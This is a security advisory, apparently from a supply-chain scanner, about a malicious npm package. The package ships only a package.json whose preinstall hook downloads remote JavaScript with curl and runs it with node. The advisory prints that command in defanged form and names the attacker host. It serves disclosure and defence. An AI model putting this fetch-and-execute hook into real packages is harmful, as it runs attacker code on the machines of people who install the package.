sn-internal-testjgsakjdkjadkjahsdkjad@2.1.1
Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)
T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool Transfer
Analysis
sn-internal-testjgsakjdkjadkjahsdkjad@2.1.1 is stub-and-fetch supply-chain malware: the tarball contains only package.json (368 bytes, no code). Its preinstall hook runs `curl hxxps://poc[.]amanrawat[.]com/hehe[.]js -o index.js && node index.js`, downloading remote JS from hxxps://poc[.]amanrawat[.]com/hehe.js and executing it on the installer's machine at install time. The stub ships no real payload, pulling it remotely to evade static analysis.
- analyzed by
- Leitwacht
- first seen
- Jun 11, 2026, 12:08 PM
- analyzed
- Jun 11, 2026, 12:08 PM
Related advisories
- node-fetch-core@1.0.0
- node-fastify@5.9.1
- node-denv@1.3.5
- node-converter@1.0.0
- sn-internal-test@1.9.9
- nodecheck-health@1.0.0
- self-certificate@1.0.0
- nj-logger@1.3.2
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.